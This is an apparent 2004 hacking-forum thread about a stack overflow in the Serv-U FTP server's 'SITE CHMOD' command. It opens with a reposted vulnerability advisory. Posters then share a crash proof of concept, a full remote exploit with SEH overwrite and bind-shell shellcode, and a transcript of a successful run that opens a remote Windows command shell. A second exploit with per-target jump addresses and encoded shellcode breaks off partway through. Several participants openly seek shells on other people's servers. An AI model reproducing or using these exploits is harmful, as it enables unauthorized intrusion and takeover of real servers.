pita
CODE

Serv-U Ftp Server Long Filename Stack Overflow Vulnerability

Application:           Serv-U

Affected Versions:     All versions prior to 4.2 (including 4.1.0.11)

Vendor:                RhinoSoft (http://www.rhinosoft.com
                      http://www.serv-u.com)

URL:                   http://www.0x557.org/release/servu.txt

Vulnerability:

 An internal memory buffer may be overrun while handling the "site chmod" command
with a filename containing excessive data. This condition may be exploited by
attackers to ultimately execute instructions with the privileges of the serv-u
process, typically administrator or system.

Details:
 
 While executing chmod on a nonexistent file, serv-u will call sprintf to
construct the response string. The code is like
 sprintf(dst, "%s: No such file or directory.", filename);

 The length of the dst buffer is only 256 bytes. If a long filename is sent,
serv-u will crash.

 A writable directory is needed to exploit this vulnerability. By overwriting SEH,
we have created a proof-of-concept exploit successfully on win2k/xp.

Solution:

 Upgrade to servu 5.0.

Credits:

 kkqq <kkqq@0x557.org> has independently discovered this vulnerability.
 All members of SST (http://www.0x557.org).
 lgx and eyas.
 Rob Beckers for identifying and fixing this vulnerability.

About SST:

 Do we really exist?


to test this just do:
site chmod 777 aaaaa (more than 256 'a' )
as u can see servu is crashing .
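
The sizing problem described in the Details section, worked through in C as an added example (not code from the advisory or from Serv-U): it measures how many bytes the advisory's `sprintf` call needs for a given filename and shows a bounded replacement that rejects over-long names. The function names and the fallback message are assumptions made for illustration; only the format string and the 256-byte buffer size come from the advisory.

```c
#include <stdio.h>
#include <string.h>

#define DST_SIZE 256                               /* dst size stated in the advisory */
#define ERR_FMT  "%s: No such file or directory."  /* format string from the advisory */

/* Bytes that sprintf(dst, ERR_FMT, filename) writes, including the
 * terminating NUL. snprintf(NULL, 0, ...) only measures, it writes nothing. */
size_t chmod_error_bytes_needed(const char *filename)
{
    int n = snprintf(NULL, 0, ERR_FMT, filename);
    return n < 0 ? 0 : (size_t)n + 1;
}

/* How far past the end of a DST_SIZE buffer the unbounded call would write
 * (0 means the message fits). */
size_t chmod_error_overrun(const char *filename)
{
    size_t need = chmod_error_bytes_needed(filename);
    return need > DST_SIZE ? need - DST_SIZE : 0;
}

/* Longest filename the unbounded call can format without overrunning dst. */
size_t chmod_max_safe_filename(void)
{
    return DST_SIZE - chmod_error_bytes_needed("");
}

/* Bounded replacement (hypothetical helper): returns 0 when the whole message
 * fits in dst, -1 when it does not. On -1, dst holds a fixed message that does
 * not echo the client-supplied name. dst is always NUL-terminated. */
int build_chmod_error(char *dst, size_t dstsz, const char *filename)
{
    int n;

    if (dst == NULL || dstsz == 0)
        return -1;

    n = snprintf(dst, dstsz, ERR_FMT, filename);
    if (n < 0 || (size_t)n >= dstsz) {
        /* truncated: replace the partial output instead of sending it */
        snprintf(dst, dstsz, "File name too long.");
        return -1;
    }
    return 0;
}

int main(void)
{
    char name[301];
    char dst[DST_SIZE];
    int rc;

    /* constructed sample input: 300 'a' characters, as in the test above */
    memset(name, 'a', 300);
    name[300] = '\0';

    printf("max safe filename: %zu bytes\n", chmod_max_safe_filename());
    printf("300-byte name needs %zu bytes, overrun by %zu\n",
           chmod_error_bytes_needed(name), chmod_error_overrun(name));

    rc = build_chmod_error(dst, sizeof dst, name);
    printf("bounded call returned %d, dst = \"%s\"\n", rc, dst);
    return 0;
}
```
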
seppel18
When comes the shell-sploit?
pita
here is a proof of concept written by me:

CODE

/*
servupoc.c
Serv-U Ftp Server Long Filename Stack Overflow Vunlnerablity
Only Proof of Concept by Pita.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <io.h>

#pragma lib <ws2_32.lib>

//Bad buffer
char buff[]="SITE CHMOD 777 "
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";


int main(int argc, char** argv)
{
 WSADATA wsdata;
 int sock;
 struct sockaddr_in target;
 char user[26]="";
 char pass[26]="";

 printf("Serv-U Ftp Server Long Filename Stack Overflow Vunlnerablity\n");
 printf("Proof of concept by Pita\n");

 if (argc < 5)
 {
    printf("%s <ip> <port> <user> <pass>\n",argv[0]);
    exit(1);
 }

 WSAStartup(MAKEWORD(2,0),&wsdata);

 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

 memset(&target, 0, sizeof(target));
 target.sin_family=AF_INET;
 target.sin_addr.s_addr = inet_addr(argv[1]);
 target.sin_port=htons(atoi(argv[2]));

 snprintf(user,26, "USER %s\r\n", argv[3]);
 snprintf(pass,26, "PASS %s\r\n", argv[4]);

 connect(sock,(struct sockaddr *)&target, sizeof(target));
 send(sock,user,sizeof(user)-1,0);
 send(sock,pass,sizeof(pass)-1,0);
 send(sock,buff,sizeof(buff),0);
 sleep(2000); // sleep a little
 printf("Crashed!\n");

 WSACleanup();
 closesocket(sock);
 return 0;
}


this will only crash the server and u need login, pass and a writable directory...
and a serv-u ftp server of course
Nexcess
QUOTE

This condition may be exploited by
attackers to ultimately execute instructions with the privileges of the serv-u
process, typically administrator or system.




Forget crashing it, someone point me in the direction of cmd shell
Reaper527
QUOTE

Linking...
suftp.obj : error LNK2019: unresolved external symbol __imp__closesocket@4 referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol __imp__WSACleanup@0 referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol _sleep referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol __imp__send@16 referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol __imp__connect@12 referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol _snprintf referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol __imp__htons@4 referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol __imp__inet_addr@4 referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol __imp__socket@12 referenced in function _main
suftp.obj : error LNK2019: unresolved external symbol __imp__WSAStartup@8 referenced in function _main
Release/strokiller.exe : fatal error LNK1120: 10 unresolved externals


if i figure anything out i'll post tips to help anyone else having problems. btw great work on the POC
pita
compile with lcc
Nexcess
If anyone has the remote root / shell version please pass it along, im not a fan of killing remote ftps for no reason. Thanks for the POC anyway though
-Nexy
redcorp
we want shell code we want shell code

DDosing Serv-u servers is kinda stupid but good work anyway
JaANDniET
hehe really needs something instead of dameware sploits
thx m8
hdlgp
I try it.
jead99
Heh, gonna try this

Thanks for sharing the info
Copkill
I have tried it but the server did not crash ;(
XtrA
i have tried it on a 4.0 server version and its still up..
pita
remember u need a writable directory...
TheOther
mmmm a buffer overrun? Lets wait till there is someone who can put a shell in it.

POC looks great, not tested yet. But why should I crash stros?
gsicht
hm..., the eax register is overridden by the string but i can't achieve the eip. *grml*
maybe it's only a dosable vulnerability
isaiah
I bet someone already released this but not sharing and thank god i use serv-u 5.0
ScriptGod
QUOTE (TheOther @ Jan 26 2004, 02:43 PM)
mmmm a buffer overrun?  Lets wait till there is someone who can put a shell in it.

POC looks great, not tested yet. But why should I crash stros?

well this bug is a simple buffer overflow bug. so you can execute code. it's possible to get a shell through this bug.
Divx_dude
this exploit is LAME
flashb4ck
is there no way to exploit without to have write access because on the most server u have only read axx ?!=!?
Viporizer
Tried it on my private server, and it worked. But now i have to make it a server again, so it wasn't that smart of me...
pita
here the exploit with shell

CODE

/*
* serv-u 4.2 site chmod long_file_name stack overflow exp
* vul discovered by kkqq 0x557 org
* exp coded by mslug safechina net
* Jan 25 2004
*/

/* test with serv-U 4.1.0.7, 4.1.0.11 on win2k sp4 en machine*/

#include <winsock2.h>
#include <stdio.h>

#define CHMOD_CMD "SITE CHMOD 0666 "
#define ERR_HEADER "550 /"
#define SEH_STACK_POSITION 0x54
#define BUF_STACK_POSITION 0x1ec
#define PADDING_SIZE (BUF_STACK_POSITION - SEH_STACK_POSITION -
strlen(ERR_HEADER))

// bindshell shellcode from www.cnhonker.org
#define    PORT             53
#define    PORT_OFFSET      176

//0x0A code removed from shellcode
unsigned char bdshellcode[] =
// decode
"\xEB\x10\x5f\x4f\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0f\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
// shellcode
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x99\xAC\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";

//unsigned long jmp_esp = 0x77f4144b;
//unsigned long jmp_ebx = 0x77a5211b;
//unsigned long call_ebx = 0x750219d6; //use this one

unsigned char evil_chmod[5000];
unsigned char seh[] = "\xeb\x06\x90\x90" //jmp below
                     "\xd6\x19\x02\x75" //call_ebx = 0x750219d6
                     "\x33\xc0"         //below: xor eax, eax
                     "\xb0\x1c"         //mov al, 1c
                     "\x03\xd8"         //add ebx, eax
                     "\xc6\x03\x90";    //mov byte ptr [ebx], 90


int main(int argc, char **argv)
{
  WSADATA wsa;
  unsigned short port;
  int ftpsock, ret;
  char recv_buf[1000];
  unsigned long     ip;
  unsigned char buf[100];

  printf("*******************************************\n");
  printf("* Serv-U 4.2 site chmod stack overflow exp*\n");
  printf("* Vul discovered by kkqq 0x557 org        *\n");
  printf("* Coded by mslug safechina net            *\n");
  printf("*******************************************\n");
  printf("\n");

  if(argc<6) {
     printf("serv.exe <host> <port> <user> <password> <path>\n");
     return 0;
  }

  WSAStartup(MAKEWORD(2,2), &wsa);

  port = htons(PORT)^(USHORT)0x9999;
  memcpy(&bdshellcode[PORT_OFFSET], &port, 2);


  ftpsock = connect_tcp(argv[1], atoi(argv[2]));
  if(ftpsock < 0) {
     printf("[-] Connection refused\n");
     return 0;
  }
  ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);

  recv_buf[ret] = 0;
  printf("%s", recv_buf);


  sprintf(buf, "USER %s\r\n", argv[3]);
  send(ftpsock, buf, strlen(buf), 0);

  ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);

  recv_buf[ret] = 0;
  printf("%s", recv_buf);

  sprintf(buf, "PASS %s\r\n", argv[4]);
  send(ftpsock, buf, strlen(buf), 0);

  ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
  recv_buf[ret] = 0;
  printf("%s", recv_buf);

  sprintf(buf, "CWD %s\r\n", argv[5]);
  send(ftpsock, buf, strlen(buf), 0);

  ret = recv(ftpsock, recv_buf, sizeof(recv_buf), 0);
  recv_buf[ret] = 0;
  printf("%s", recv_buf);

  memset(evil_chmod, 0x90, sizeof(evil_chmod));
  memcpy(evil_chmod, CHMOD_CMD, strlen(CHMOD_CMD));
  memcpy(&evil_chmod[strlen(CHMOD_CMD)+PADDING_SIZE], seh, strlen(seh));
  memcpy(&evil_chmod[strlen(CHMOD_CMD)+PADDING_SIZE+strlen(seh)+20],
bdshellcode, strlen(bdshellcode));

  send(ftpsock, evil_chmod, strlen(evil_chmod), 0);

  printf("[+] Shellcode sent\n");
  printf("[+] Now nc to port 53\n");

  closesocket(ftpsock);
  WSACleanup();

  return 0;
}

int connect_tcp(char *host, int port)
{
  struct hostent *rhost;
  struct sockaddr_in sin_rhost;
  unsigned long ip_rhost;
  int sock;

  memset(&sin_rhost, 0, sizeof(sin_rhost));

  sin_rhost.sin_family = AF_INET;
  sin_rhost.sin_port = htons(port);
  ip_rhost = inet_addr(host);
  if(ip_rhost==INADDR_NONE) {
     rhost = gethostbyname(host);
     if(rhost==0) return -1;
     ip_rhost = *(unsigned long*)rhost->h_addr;
  }

  sin_rhost.sin_addr.s_addr = ip_rhost;

  sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  if(sock<0) {
     return -1;
  }

  if(connect(sock, (struct sockaddr*) &sin_rhost, sizeof(sin_rhost))) {
     return -1;
  }

  return sock;
}
x1`
nice one m8 did u test it ? also which compiler did u use
BlackBoard
serv-u 4.2 site chmod long_file_name stack overflow exp

$ gcc servu.c
servu.c:19: error: syntax error before string constant
servu.c: In function `main':
servu.c:93: error: `bdshellcode' undeclared (first use in this function)
servu.c:93: error: (Each undeclared identifier is reported only once
servu.c:93: error: for each function it appears in.)
servu.c:131: error: syntax error before ']' token
servu.c:132: error: syntax error before ']' token
servu.c:176:2: warning: no newline at end of file
TheOther
I use ms CC++:


Compiling...
servExploit.c
c:\servexploit.c(18) : error C2143: syntax error : missing ')' before 'string'
c:\servexploit.c(18) : error C2143: syntax error : missing '{' before 'string'
c:\servexploit.c(18) : error C2059: syntax error : '<Unknown>'
c:\servexploit.c(18) : error C2059: syntax error : ')'
c:\servexploit.c(18) : error C2059: syntax error : ')'
c:\servexploit.c(92) : error C2065: 'bdshellcode' : undeclared identifier
c:\servexploit.c(92) : error C2109: subscript requires array or pointer type
c:\servexploit.c(92) : error C2102: '&' requires l-value
c:\servexploit.c(92) : warning C4022: 'memcpy' : pointer mismatch for actual parameter 2
c:\servexploit.c(92) : error C2198: 'memcpy' : too few actual parameters
c:\servexploit.c(95) : warning C4013: 'connect_tcp' undefined; assuming extern returning int
c:\servexploit.c(130) : error C2059: syntax error : ']'
c:\servexploit.c(131) : error C2143: syntax error : missing ')' before ']'
c:\servexploit.c(132) : warning C4022: 'memcpy' : pointer mismatch for actual parameter 2
c:\servexploit.c(132) : warning C4047: 'function' : 'const char *' differs in levels of indirection from 'int '
c:\servexploit.c(132) : warning C4024: 'strlen' : different types for formal and actual parameter 1
easternerd
Yes the cj team released it..
but they told us not to get it
to open...
DeathDriver
i had no problems with compiling. i did it with borland c++builderX

the only thing i had to do was inserting "int connect_tcp(char *host, int port);"

above

"int main(int argc, char **argv)"

the result is:

CODE
//...
unsigned char seh[] = "\xeb\x06\x90\x90" //jmp below
                    "\xd6\x19\x02\x75" //call_ebx = 0x750219d6
                    "\x33\xc0"         //below: xor eax, eax
                    "\xb0\x1c"         //mov al, 1c
                    "\x03\xd8"         //add ebx, eax
                    "\xc6\x03\x90";    //mov byte ptr [ebx], 90


int connect_tcp(char *host, int port);

int main(int argc, char **argv)
{
 WSADATA wsa;
 unsigned short port;
 int ftpsock, ret;
//...


after compiling i tried it with my servu server, but the server just shut down. maybe i have to disable my firewall. or i made another mistake...
gsicht
QUOTE

this exploit is LAME

it's a dos exploit! pita coded this exploit to show that there's a stack overflow in servu. thanks to pita
i just found the place where the eip is. i'll try to code a working exploit. you can help me if you will.

here is an example how to overwrite the eip
CODE

/*
* the XXXX in buff[] is the return address
* gsicht
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>


char buff[] = "SITE CHMOD 777 "
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAXXXXAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAA\r\n";


int main(int argc, char *argv[])
{

struct sockaddr_in target;
struct sockaddr_in test;
int s, i;
char buffer[1000];
char user[50];
char pass[50];
char empf_buffer[1024];

sprintf(user,"USER %s\r\n",argv[3]);
sprintf(pass,"PASS %s\r\n",argv[4]);

printf("\n----- hier ist die topic -----\n");

if(argc < 4)
{
 printf("\nUsage:\t%s <host> <port> <user> <pass>\n\n",argv[0]);
 exit(-1);
}

s=socket(AF_INET,SOCK_STREAM,0);

target.sin_family = AF_INET;
target.sin_port = htons(atoi(argv[2]));
target.sin_addr.s_addr = inet_addr(argv[1]);

printf("\n- connecting...\n");

if (connect (s, (struct sockaddr *) &target, sizeof(target)) == -1)
{
 printf("  could not connect!\n");
 exit(-1);
}
printf("  connected\n");

printf("- user\t%s\n",argv[3]);
printf("- pass\t%s\n",argv[4]);
write(s,user,strlen(user));
sleep(1);
write(s,pass,strlen(pass));
sleep(1);

i=recv(s,empf_buffer,sizeof(empf_buffer),0);
empf_buffer[i]='\0';

if(strstr(empf_buffer,"230")!=NULL )
{
 printf("  user logged in\n");
 sleep(1);
}
else
{
 printf("  wrong username or password!\n");
 exit(-1);
}


printf("- sending %d bytes\n",strlen(buff));
write(s,buff,strlen(buff));
sleep(1);
printf("- done\n");
close(s);

return 0;
}
gsicht
oh, i didn't see the exploit from 0x557
forget my post
temp
works great..

Z:\servu\Release>cpp1 192.168.0.10 21 test test /
*******************************************
* Serv-U 4.2 site chmod stack overflow exp*
* Vul discovered by kkqq 0x557 org *
* Coded by mslug safechina net *
*******************************************

220 Serv-U FTP Server v4.1 for WinSock ready...
331 User name okay, need password.
230 User logged in, proceed.
250 Directory changed to /
[+] Shellcode sent
[+] Now nc to port 53

Z:\servu\Release>z:\nc 192.168.0.10 53

Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\>
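
A defender-side check for the request shape used throughout this thread, as an added example that is not part of any post: it classifies FTP control-channel lines and flags `SITE CHMOD` requests whose filename argument is longer than the advisory's 256-byte buffer can hold. The posted requests differ in case and mode (`SITE CHMOD 777`, `SITE CHMOD 0666`, `site chmod 777`), so matching is case-insensitive and skips the mode token; the function names, the 227-byte limit derived from the advisory's figures, and the sample session are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumption derived from the advisory: 256-byte buffer, minus the 28-byte
 * ": No such file or directory." suffix, minus the terminating NUL. A server
 * that prepends a directory to the name leaves even less room, so a
 * deployment may want a lower limit. */
#define MAX_SAFE_ARG 227

enum verdict { NOT_CHMOD = 0, CHMOD_OK = 1, CHMOD_OVERLONG = 2 };

/* Match one upper-case keyword case-insensitively, followed by at least one
 * space or tab. Returns a pointer past the keyword and blanks, or NULL. */
static const char *eat_word(const char *p, const char *word)
{
    while (*word) {
        if (toupper((unsigned char)*p) != *word)
            return NULL;
        p++;
        word++;
    }
    if (*p != ' ' && *p != '\t')
        return NULL;
    while (*p == ' ' || *p == '\t')
        p++;
    return p;
}

/* Classify one client-to-server control line. *arg_len receives the length
 * of the filename argument (everything after the mode, up to CR/LF). */
enum verdict classify_ftp_line(const char *line, size_t *arg_len)
{
    const char *p = line;

    *arg_len = 0;
    while (*p == ' ' || *p == '\t')
        p++;
    if ((p = eat_word(p, "SITE")) == NULL)
        return NOT_CHMOD;
    if ((p = eat_word(p, "CHMOD")) == NULL)
        return NOT_CHMOD;

    /* skip the mode token (777, 0666, ...) and the blanks after it */
    while (*p && *p != ' ' && *p != '\t' && *p != '\r' && *p != '\n')
        p++;
    while (*p == ' ' || *p == '\t')
        p++;

    *arg_len = strcspn(p, "\r\n");
    return *arg_len > MAX_SAFE_ARG ? CHMOD_OVERLONG : CHMOD_OK;
}

/* Walk a capture of control lines and count the over-long SITE CHMOD ones. */
size_t count_overlong_chmod(const char *capture)
{
    size_t hits = 0, arg_len;
    const char *line = capture;

    while (*line) {
        if (classify_ftp_line(line, &arg_len) == CHMOD_OVERLONG)
            hits++;
        line += strcspn(line, "\n");
        if (*line == '\n')
            line++;
    }
    return hits;
}

int main(void)
{
    char capture[1024];
    size_t off;

    /* constructed sample session: a normal chmod and one with 300 filler bytes */
    off = (size_t)snprintf(capture, sizeof capture,
                           "USER test\r\nPASS test\r\nCWD /\r\n"
                           "site chmod 777 readme.txt\r\n"
                           "SITE CHMOD 0666 ");
    memset(capture + off, 'A', 300);
    strcpy(capture + off + 300, "\r\n");

    printf("over-long SITE CHMOD lines: %zu\n", count_overlong_chmod(capture));
    return 0;
}
```
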
SkyRaVeR
th@nx mate ! nice work ! tried this one but no success

even with shellcode servu just crashes and doesn't open local shell. too bad !

greetz, sky
Milka
too bad this only works for serv-u where you DO have admin rights... otherwise.. a lot of servers would be (filtered)

temp
you don't need admin rights..
just write access
the
@ temp
which compiler did u use dude ??
greetz
Nexcess
QUOTE (the @ Jan 26 2004, 08:25 PM)
@ temp
which compiler did u use dude ??
greetz

it wasnt borland.. or at least i had no luck with it
Oh well, maybe someone will save me the trouble of finding
the right compiler and post the binary
AlessandroIT
Hey m8...If sm1 successfully Code This Exploit (with shell reverse), can we Post iT to Download section? There is only a DoS exploit 4 serv-u...It is bad
TheOther
Nice one Temp!!

But the idea of a forum is to help each other out.


Could you share your knowledge with us?
BlackBoard
I got still problems with compiling, i tried it with microsoft visual c++ 6.0, cygwin and lcc. Can someone tell me how i can compile it correctly. Thank You
x1`
temp can u post your working version in download section i cant compile it either
Planquadrat
here is another one for serv-u 3.x and 4.x i have successfully compiled it with MS C++

QUOTE

/*
*-----------------------------------------------------------------------
*
* Servu.c - Serv-U FTPD 3.x/4.x "SITE CHMOD" Command
* Remote stack buffer overflow exploit
*
* Copyright © 2004 HUC All Rights Reserved.
*
* Author : lion
* : lion@cnhonker.net
* : http://www.cnhonker.com
* Date : 2004-01-25
* : 2004-01-25 v1.0 Can attack Serv-U v3.0.0.20~v4.1.0.11
* Tested : Windows 2000 Server EN/GB
* :     + Serv-U v3.0.0.20~v4.1.0.11
* Notice : *** Bug found by kkqq kkqq@0x557.org ***
*     : *** You need a valid account and a writable directory. ***
* Complie : cl Servu.c
* Usage     : Servu <-i ip> <-t type> [-u user] [-p pass] [-d dir] [-f ftpport] [-c cbhost] [-s shellport]
*------------------------------------------------------------------------
*/

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib, "ws2_32")

// for bind shellcode
#define BIND_OFFSET        91

// for connectback shellcode
#define PORT_OFFSET        95
#define IP_OFFSET        88

#define SEH_OFFSET        0x193    //v3.0.0.20~v4.1.0.11
//#define    SEH_OFFSET        0x133     // work on v3.0.0.16~v3.0.0.19, for connectback shellcode
#define MAX_LEN            2048
#define JMP_OVER        "\xeb\x06\xeb\x06"
#define    VERSION            "1.0"

struct
{
    DWORD    dwJMP;
    char    *szDescription;
}targets[] =
{
    {0x7ffa4a1b,"Serv-U v3.0.0.20~v4.1.0.11 GB 2K/XP ALL"},        //for all GB win2000 and winxp
//    {0x74FD69A9,"Serv-U v3.0.0.20~v4.1.0.11 GB 2K SP3/SP4"},    //wsock32.dll jmp ebx addr
//    {0x71a469ad,"Serv-U v3.0.0.20~v4.1.0.11 GB XP SP0/SP1"},    //wsock32.dll jmp ebx addr
//    {0x77e45f17,"Serv-U v3.0.0.20~v4.1.0.11 GB/BG 2K SP4"},        //user32.dll jmp ebx addr
    {0x7ffa2186,"Serv-U v3.0.0.20~v4.1.0.11 BG 2K/XP ALL"},        //for all BG win2000 and winxp   
//    {0x6dec6713,"Serv-U v3.0.0.20~v4.1.0.11 BG 2K SP4"},        //setupapi.dll jmp ebx addr
    {0x6DEE6713,"Serv-U v3.0.0.20~v4.1.0.11 KR 2K SP4"},        //setupapi.dll jmp ebx addr
    {0x77886713,"Serv-U v3.0.0.20~v4.1.0.11 EN 2K SP4"},        //setupapi.dll jmp ebx addr
    {0x76b42a3a,"Serv-U v3.0.0.20~v4.1.0.11 EN XP SP1"},
//    {0x12345678,"Serv-U v3.0.0.20~v4.1.0.11"},
},v;


unsigned char    *szSend[4];
unsigned char    szCommand[MAX_LEN];
char        szDirectory[0x100];

// 28 bytes decode by lion, don't change this.
unsigned char decode[]=
"\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43\x39\x3B\x75"
"\xFB\x4B\x80\x33\x93\x39\x73\xFC\x75\xF7\xFF\xD3";

// Shellcode start sign, use for decode, don't change this.
unsigned char sc_start[]=
"lion";

// Shellcode end sign, use for decode, don't change this.
unsigned char sc_end[]=
"li0n";

// 311 bytes bind shellcode by lion (xor with 0x93)
unsigned char sc[]=
"\x7A\x96\x92\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18"
"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x36\x93\x93\x93"
"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18"
"\x7B\xF9\x95\xCA\x7B\x1F\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93"
"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92"
"\xF9\x91\x6C\xC5\x87\x18\x4B\x54\x94\x91\x93\x93\xA6\xA0\x53\x1A"
"\xD4\x97\xF9\x83\xC4\xC0\x6C\xC5\x8B\xF9\x92\xC0\x6C\xC5\x8F\xC3"
"\xC3\xC0\x6C\xC5\xB3\x18\x4B\xA0\x53\xFB\xF0\xFE\xF7\x93\x1A\xF5"
"\xA3\x10\x7F\xC7\x18\x6F\xF9\x87\xCA\x1A\x97\x1C\x71\x68\x55\xD4"
"\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A\xCC\xDB\x1A\xCC\xDF\x1A\xCC"
"\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2\xC2\xF9\x92\xC2\xC2\x6C\xE5"
